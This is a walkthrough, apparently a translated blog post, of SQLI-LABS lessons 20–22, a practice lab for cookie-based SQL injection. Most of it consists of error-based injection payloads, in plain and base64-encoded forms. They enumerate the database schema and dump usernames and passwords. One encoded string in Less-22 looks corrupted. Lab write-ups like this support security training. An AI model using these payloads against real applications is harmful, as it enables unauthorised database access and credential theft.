SQLI-LABS Less-20 to Less-22

Cookies

Cookie injection is a little different from other Header injections

Cookie: The browser sends a cookie when it sends a request to the server, or the server attaches a cookie to the browser, which is where the cookie is placed. For example: Cookie:user=admin

Source code If you set a cookie, the following statement will be executed

will not execute:

Less-20

Log in to an account, Hackbar LOAD command or Burp Suite to capture packets

Closing character: ‘$cookee’

Query the current database:

Dumb' or extractvalue(1,concat(0x7e,database())) #
#uname=Dumb This can be filled in casually, it will not affect extractvalue()

Query the tables under the current database:

Dumb' or extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema="security"))) #

Query the fields of the current table:

Dumb' or extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users"))) #

Query data:

Dumb' or extractvalue(1,concat(0x7e,substr((select group_concat(username,'@',password) from security.users),1,31))) #

Dumb' or extractvalue(1,concat(0x7e,substr((select group_concat(username,'@',password) from security.users),31,31))) #

Less-21

base64_decode(), base64 decode it

Log in to an account, use the Hackbar LOAD command, first decode the = url (taken from the web page) and then base64 decode it, that is Dumb

Closing character: (‘$uname’)

Query the current database:

Dumb') or extractvalue(1,concat(0x7e,database())) #

base64: dW5hbWU9RHVtYicpIG9yIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgweDdlLGRhdGFiYXNlKCkpKSAj

Query the table of the database:

Dumb') or extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema="security"))) #

base64: dW5hbWU9RHVtYicpIG9yIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgweDdlLChzZWxlY3QgZ3JvdXBfY29uY2F0KHRhYmxlX25hbWUpIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnRhYmxlcyB3aGVyZSB0YWJsZV9zY2hlbWE9InNlY3VyaXR5IikpKSAj

Query the fields of the current table:

Dumb') or extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users"))) #

base64: dW5hbWU9RHVtYicpIG9yIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgweDdlLChzZWxlY3QgZ3JvdXBfY29uY2F0KGNvbHVtbl9uYW1lKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS5jb2x1bW5zIHdoZXJlIHRhYmxlX3NjaGVtYT0ic2VjdXJpdHkiIGFuZCB0YWJsZV9uYW1lPSJ1c2VycyIpKSkgIw==

Query data:

Dumb') or extractvalue(1,concat(0x7e,substr((select group_concat(username,'@',password) from security.users),1,31))) #
Dumb') or extractvalue(1,concat(0x7e,substr((select group_concat(username,'@',password) from security.users),31,31))) #
...

base64:
Q29va2llOiB1bmFtZT1EdW1iJykgb3IgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2Usc3Vic3RyKChzZWxlY3QgZ3JvdXBfY29uY2F0KHVzZXJuYW1lLCdAJyxwYXNzd29yZCkgZnJvbSBzZWN1cml0eS51c2VycyksMSwzMSkpKSAj

dW5hbWU9RHVtYicpIG9yIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgweDdlLHN1YnN0cigoc2VsZWN0IGdyb3VwX2NvbmNhdCh1c2VybmFtZSwnQCcscGFzc3dvcmQpIGZyb20gc2VjdXJpdHkudXNlcnMpLDMxLDMxKSkpICM=

Less-22

changed closing character

Log in to an account, Hackbar LOAD command or Burp Suite to capture packets, RHVtYg==, =(url code=), namely Dumb

Jump back to Less-21 here, the file name in the address bar has changed to LEss-22

Closing character: “$cookee1”

Query the current database:

Dumb" or extractvalue(1,concat(0x7e,database())) #

base64: Q29va2llOiB1bmFtZT1EdW1iIiBvciBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHg3ZSxkYXRhYmFzZSgpKSkgIw==

Query the tables of the current database:

Dumb" or extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema="security"))) #

base64: Q29va2llOiB1bmFtZT1EdW1iIiBvciBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGdyb3VwX2NvbmNhdCh0YWJsZV9uYW1lKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgd2hlcmUgdGFibGVfc2NoZW1hPSJzZWN1cml0eSIpKSkgIw==

Query the fields of the current table:

Dumb" or extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users"))) #

base64: RHVtYiIgb3IgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBncm91cF9jb25jYXQoY29sdW1uX25hbWUpIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLmNvbHVtbnMgd2hlcmUgdGFibGVfc2NoZW1hPSJzZWN1cml0eSIgYW5kIHRhYmxlX25hbWU9InVzZXJzIikpKSAj

Query data:

Dumb" or extractvalue(1,concat(0x7e,substr((select group_concat(username,'@',password) from security.users),1,31))) #
Dumb" or extractvalue(1,concat(0x7e,substr((select group_concat(username,'@',password) from security.users),31,31))) #
...

base64:
RHVtYiIgb3IgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2Usc3Vic3RyKChzZWxlY3QgZ3JvdXBfY29uY2F0KHVzZXJuYW1lLCdAJyxwYXNzd29yZCkgZnJvbSBzZWN1cml0yMSkpSA

RHVtYiIgb3IgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2Usc3Vic3RyKChzZWxlY3QgZ3JvdXBfY29uY2F0KHVzZXJuYW1lLCdAJyxwYXNzd29yZCkgZnJvbSBzZWN1cml0eS51c2VycyksMzEsMzEpKSkgIw==

The knowledge points of the article match the official knowledge files, and you can further learn related knowledge MySQL entry skill tree Database composition Table 44914 people are studying systematically